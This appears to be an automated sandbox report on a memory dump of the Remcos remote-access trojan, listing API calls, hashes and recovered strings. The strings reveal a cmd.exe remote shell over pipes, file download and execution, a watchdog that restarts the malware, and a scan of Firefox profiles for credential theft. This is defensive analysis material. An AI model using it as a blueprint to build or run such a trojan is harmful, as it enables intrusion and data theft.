                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseOpenQueryValue
                                                        • String ID:
                                                        • API String ID: 3677997916-0
                                                        • Opcode ID: 047bda59581c7e78827521e08e68fdf793dfebd6250409dd5ae19ad748ced965
                                                        • Instruction ID: 357f89d7cd1c8cc036c5e31f86fe90e90b696c4569df010e686479b524d11f87
                                                        • Opcode Fuzzy Hash: 047bda59581c7e78827521e08e68fdf793dfebd6250409dd5ae19ad748ced965
                                                        • Instruction Fuzzy Hash: 5A01D676900228BBCF209B91DC09DEF7FBDDB84751F000066BB09E2240DA748E45DBA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 00413714
                                                        • RegQueryValueExA.KERNEL32 ref: 0041372D
                                                        • RegCloseKey.KERNEL32(00000000), ref: 00413738
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseOpenQueryValue
                                                        • String ID:
                                                        • API String ID: 3677997916-0
                                                        • Opcode ID: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                                                        • Instruction ID: 3f277cad741e4f631881634228dfc272d65c1146f3ef4f3c344e6cfa7cb73972
                                                        • Opcode Fuzzy Hash: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                                                        • Instruction Fuzzy Hash: 1C018BB1400229FBDF216FA1DC04DEB3F38EF05751F004065BE08621A1D6358AA5DBA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413569
                                                        • RegQueryValueExA.KERNEL32 ref: 00413587
                                                        • RegCloseKey.KERNEL32(?), ref: 00413592
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseOpenQueryValue
                                                        • String ID:
                                                        • API String ID: 3677997916-0
                                                        • Opcode ID: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                                        • Instruction ID: df0ca7b2621da3f23a966dc0a7f3323316399916f3769291e5945d4ebcba47cd
                                                        • Opcode Fuzzy Hash: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                                        • Instruction Fuzzy Hash: E8F01776900218FFDF109FA0DC05FEEBBBCEB04B11F1040A6BA09E6191E2359F54AB94
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413516
                                                        • RegQueryValueExA.KERNEL32 ref: 0041352A
                                                        • RegCloseKey.KERNEL32(?), ref: 00413535
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseOpenQueryValue
                                                        • String ID:
                                                        • API String ID: 3677997916-0
                                                        • Opcode ID: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                                        • Instruction ID: ffaae2385a847085e6fb085aa4760e2a706d619ab1068a3de776aab9102a8dd7
                                                        • Opcode Fuzzy Hash: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                                        • Instruction Fuzzy Hash: 46E06D32801238FB9F204FA2DC0DDEB7F6CEF06FA2B000155BD0DA2112E2258E50E6E4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                                        • RegSetValueExA.KERNEL32(004660A4,000000AF,00000000,00000004,00000001,00000004), ref: 004138A0
                                                        • RegCloseKey.KERNEL32(004660A4), ref: 004138AB
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseCreateValue
                                                        • String ID:
                                                        • API String ID: 1818849710-0
                                                        • Opcode ID: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                                        • Instruction ID: 04a42b38e2882b978ed87177a7d0f50f8458418d63be9de7f69fe35b215911ab
                                                        • Opcode Fuzzy Hash: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                                        • Instruction Fuzzy Hash: 16E06572500318FBEF115F90DC05FEA7B6CDF04B52F1045A5BF09A6191D3358E549798
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0044EDE9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Info
                                                        • String ID:
                                                        • API String ID: 1807457897-3916222277
                                                        • Opcode ID: a85cb1b2b9373234b1d7ad287e33ad953b4b977bb3bdbd209019650f1141d576
                                                        • Instruction ID: 44bbd8f54034b75cb3f6f6e84f1b5a7d7ac270184ed4e74474e217fcd589b3ab
                                                        • Opcode Fuzzy Hash: a85cb1b2b9373234b1d7ad287e33ad953b4b977bb3bdbd209019650f1141d576
                                                        • Instruction Fuzzy Hash: 74411E705043489AEF218F65CC84AF7BBB9FF45308F2408EEE59A87142D2399E45DF65
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _wcslen
                                                        • String ID: pQG
                                                        • API String ID: 176396367-3769108836
                                                        • Opcode ID: 1f3b91536cece4da7108cf24afec647958326f81796985407c04b0a2ae37731c
                                                        • Instruction ID: e6961f6084f98a1e57a9a6385a58e5d20214d93246a99e64d0d6a4ea431d93e1
                                                        • Opcode Fuzzy Hash: 1f3b91536cece4da7108cf24afec647958326f81796985407c04b0a2ae37731c
                                                        • Instruction Fuzzy Hash: 8111C3319002059BCB15EF65E8529EF7BB5EF54318B10013FF406A62E2EFB8AD05CB98
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000001,?,?), ref: 00448C24
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: String
                                                        • String ID: LCMapStringEx
                                                        • API String ID: 2568140703-3893581201
                                                        • Opcode ID: 0d5bd11df5ef9a2e9891dfdca4fac69d3ce43e49c64e471a80bfc951609a4a07
                                                        • Instruction ID: 91dcaeff4e4508283399e99d6512adb219adb357de156da575c9a111b1dd59a7
                                                        • Opcode Fuzzy Hash: 0d5bd11df5ef9a2e9891dfdca4fac69d3ce43e49c64e471a80bfc951609a4a07
                                                        • Instruction Fuzzy Hash: 3F016532500209FBCF029F90DC01EEE7F62EF08351F10452AFE0925161CA3A8971AB99
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,0044BF4F,-00000020,00000FA0,00000000,00467378,00467378), ref: 00448ACF
                                                        Strings
                                                        • InitializeCriticalSectionEx, xrefs: 00448A9F
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CountCriticalInitializeSectionSpin
                                                        • String ID: InitializeCriticalSectionEx
                                                        • API String ID: 2593887523-3084827643
                                                        • Opcode ID: 682e35b38dfd5190380aa89288d85395b8b8c573abd287f9b51c67f13ec4e10f
                                                        • Instruction ID: 658be74961f29c719de8c28810f5b4ff6aac6a213607643c1e3aaf487ccb6ecc
                                                        • Opcode Fuzzy Hash: 682e35b38dfd5190380aa89288d85395b8b8c573abd287f9b51c67f13ec4e10f
                                                        • Instruction Fuzzy Hash: 12F0E235640208FBCF019F51DC06EAE7F61EF48722F10816AFC096A261DE799D25ABDD
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Alloc
                                                        • String ID: FlsAlloc
                                                        • API String ID: 2773662609-671089009
                                                        • Opcode ID: b059b7acde134c04013a83b120bbe810436e60e70eecf54d389d9c1387c32ac7
                                                        • Instruction ID: c1fb2f6f3e96c04a711f36652bc0978b46922b6b0bac1ff16f6cb7e5114ce70e
                                                        • Opcode Fuzzy Hash: b059b7acde134c04013a83b120bbe810436e60e70eecf54d389d9c1387c32ac7
                                                        • Instruction Fuzzy Hash: 98E02B30640218E7D700AF65DC16A6EBB94CF48B12B20057FFD0557391DE786D0595DE
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • try_get_function.LIBVCRUNTIME ref: 00438DA9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: try_get_function
                                                        • String ID: FlsAlloc
                                                        • API String ID: 2742660187-671089009
                                                        • Opcode ID: 5196da0208b4c88d7e80b60f7c4aa489d06214170f9357b8a7661789506c7008
                                                        • Instruction ID: 997240ade825b32cd49e327dc5ad0f79abc42783939d358afc793268dfa947f7
                                                        • Opcode Fuzzy Hash: 5196da0208b4c88d7e80b60f7c4aa489d06214170f9357b8a7661789506c7008
                                                        • Instruction Fuzzy Hash: 1FD05B31B8172866861036D56C02B99F654CB45BF7F14106BFF0875293999D581451DE
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GlobalMemoryStatusEx.KERNEL32(?), ref: 0041B7CA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: GlobalMemoryStatus
                                                        • String ID: @
                                                        • API String ID: 1890195054-2766056989
                                                        • Opcode ID: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                                                        • Instruction ID: 2d2b64c70bc766df394076410504e3f9c8f669937c614d63c6700d8895b1c70c
                                                        • Opcode Fuzzy Hash: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                                                        • Instruction Fuzzy Hash: E6D017B58023189FC720DFA8E804A8DBBFCFB08210F00456AEC49E3700E770E8008B94
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 0044ECEC: GetOEMCP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED17
                                                        • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0044EFBA,?,00000000), ref: 0044F18D
                                                        • GetCPInfo.KERNEL32(00000000,0044EFBA,?,?,?,0044EFBA,?,00000000), ref: 0044F1A0
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CodeInfoPageValid
                                                        • String ID:
                                                        • API String ID: 546120528-0
                                                        • Opcode ID: 0fcd41bea27e2464632381dc73460c859b02871e76ebf75d2761c723038ba765
                                                        • Instruction ID: 3b7bf12515eb554c774b4e527f81d40cffab4a6430697902d987c8214247c1f3
                                                        • Opcode Fuzzy Hash: 0fcd41bea27e2464632381dc73460c859b02871e76ebf75d2761c723038ba765
                                                        • Instruction Fuzzy Hash: BB5116749002469EFB24CF76C8816BBBBE5FF41304F1444BFD08687251D6BE994ACB99
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                          • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                          • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                          • Part of subcall function 0044F077: _abort.LIBCMT ref: 0044F0A9
                                                          • Part of subcall function 0044F077: _free.LIBCMT ref: 0044F0DD
                                                          • Part of subcall function 0044ECEC: GetOEMCP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED17
                                                        • _free.LIBCMT ref: 0044EFD0
                                                        • _free.LIBCMT ref: 0044F006
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _free$ErrorLast_abort
                                                        • String ID:
                                                        • API String ID: 2991157371-0
                                                        • Opcode ID: 23ed7ce0d1312216544e861ed2cc667081b9de49bf4146cfd61311aa69b4ec7f
                                                        • Instruction ID: 3a29b68b49955ca98559fee15c42126097606514ccea0e67eec2104835090475
                                                        • Opcode Fuzzy Hash: 23ed7ce0d1312216544e861ed2cc667081b9de49bf4146cfd61311aa69b4ec7f
                                                        • Instruction Fuzzy Hash: FD31D531904104BFFB10EB6AD440B9EB7E4FF40329F2540AFE5149B2A1DB399D45CB48
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetProcAddress.KERNEL32(00000000,?,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000,00000364,?,004482E7,00000000), ref: 0044852A
                                                        • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00448537
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AddressProc__crt_fast_encode_pointer
                                                        • String ID:
                                                        • API String ID: 2279764990-0

                                                        APIs
                                                        • socket.WS2_32(?,00000001,00000006), ref: 00404852
                                                        • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,0040530B,?,?,00000000,00000000,?,?,00000000,00405208,?,00000000), ref: 0040488E
                                                          • Part of subcall function 0040489E: WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateEventStartupsocket
                                                        • String ID:
                                                        • API String ID: 1953588214-0

                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Window$ForegroundText
                                                        • String ID:
                                                        • API String ID: 29597999-0

                                                        APIs
                                                        • getaddrinfo.WS2_32(00000000,00000000,00000000,00472ADC,004750E4,00000000,00415188,00000000,00000001), ref: 00414F0B
                                                        • WSASetLastError.WS2_32(00000000), ref: 00414F10
                                                          • Part of subcall function 00414D86: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414DD5
                                                          • Part of subcall function 00414D86: LoadLibraryA.KERNEL32(?), ref: 00414E17
                                                          • Part of subcall function 00414D86: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E37
                                                          • Part of subcall function 00414D86: FreeLibrary.KERNEL32(00000000), ref: 00414E3E
                                                          • Part of subcall function 00414D86: LoadLibraryA.KERNEL32(?), ref: 00414E76
                                                          • Part of subcall function 00414D86: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E88
                                                          • Part of subcall function 00414D86: FreeLibrary.KERNEL32(00000000), ref: 00414E8F
                                                          • Part of subcall function 00414D86: GetProcAddress.KERNEL32(00000000,?), ref: 00414E9E
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                                                        • String ID:
                                                        • API String ID: 1170566393-0

                                                        APIs
                                                          • Part of subcall function 00438D94: try_get_function.LIBVCRUNTIME ref: 00438DA9
                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A40A
                                                        • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 0043A415
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                                        • String ID:
                                                        • API String ID: 806969131-0

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: __alldvrm
                                                        • String ID:
                                                        • API String ID: 65215352-0

                                                        APIs
                                                        • RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateHeap
                                                        • String ID:
                                                        • API String ID: 1279760036-0

                                                        APIs
                                                        • WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Startup
                                                        • String ID:
                                                        • API String ID: 724789610-0

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: send
                                                        • String ID:
                                                        • API String ID: 2809346765-0

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: recv
                                                        • String ID:
                                                        • API String ID: 1507349165-0

                                                        APIs
                                                        • SetEvent.KERNEL32(?,?), ref: 00407CB9
                                                        • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407D87
                                                        • DeleteFileW.KERNEL32(00000000), ref: 00407DA9
                                                          • Part of subcall function 0041C291: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C2EC
                                                          • Part of subcall function 0041C291: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C31C
                                                          • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C371
                                                          • Part of subcall function 0041C291: FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D2
                                                          • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D9
                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                          • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                          • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                          • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00408197
                                                        • GetLogicalDriveStringsA.KERNEL32 ref: 00408278
                                                        • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084C4
                                                        • DeleteFileA.KERNEL32(?), ref: 00408652
                                                          • Part of subcall function 0040880C: __EH_prolog.LIBCMT ref: 00408811
                                                          • Part of subcall function 0040880C: FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
                                                          • Part of subcall function 0040880C: __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
                                                          • Part of subcall function 0040880C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
                                                        • Sleep.KERNEL32(000007D0), ref: 004086F8
                                                        • StrToIntA.SHLWAPI(00000000), ref: 0040873A
                                                          • Part of subcall function 0041C9E2: SystemParametersInfoW.USER32 ref: 0041CAD7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                                                        • String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
                                                        • API String ID: 1067849700-181434739

                                                        APIs
                                                        • __Init_thread_footer.LIBCMT ref: 004056E6
                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                        • __Init_thread_footer.LIBCMT ref: 00405723
                                                        • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660BC,00000000), ref: 004057B6
                                                        • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
                                                        • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
                                                        • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                                                        • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
                                                        • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                                                          • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                                        • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90), ref: 004059E4
                                                        • Sleep.KERNEL32(00000064,00000062,004660A4), ref: 004059FE
                                                        • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                                                        • CloseHandle.KERNEL32 ref: 00405A23
                                                        • CloseHandle.KERNEL32 ref: 00405A2B
                                                        • CloseHandle.KERNEL32 ref: 00405A3D
                                                        • CloseHandle.KERNEL32 ref: 00405A45
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                        • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
                                                        • API String ID: 2994406822-18413064

                                                        APIs
                                                        • GetCurrentProcessId.KERNEL32 ref: 00412106
                                                          • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                                          • Part of subcall function 00413877: RegSetValueExA.KERNEL32(004660A4,000000AF,00000000,00000004,00000001,00000004), ref: 004138A0
                                                          • Part of subcall function 00413877: RegCloseKey.KERNEL32(004660A4), ref: 004138AB
                                                        • OpenMutexA.KERNEL32 ref: 00412146
                                                        • CloseHandle.KERNEL32(00000000), ref: 00412155
                                                        • CreateThread.KERNEL32(00000000,00000000,004127EE,00000000,00000000,00000000), ref: 004121AB
                                                        • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041241A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                                        • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                                        • API String ID: 3018269243-13974260

                                                        APIs
                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBAF
                                                        • FindClose.KERNEL32(00000000), ref: 0040BBC9
                                                        • FindNextFileA.KERNEL32(00000000,?), ref: 0040BCEC
                                                        • FindClose.KERNEL32(00000000), ref: 0040BD12
                                                        Strings
                                                        Memory Dump Source
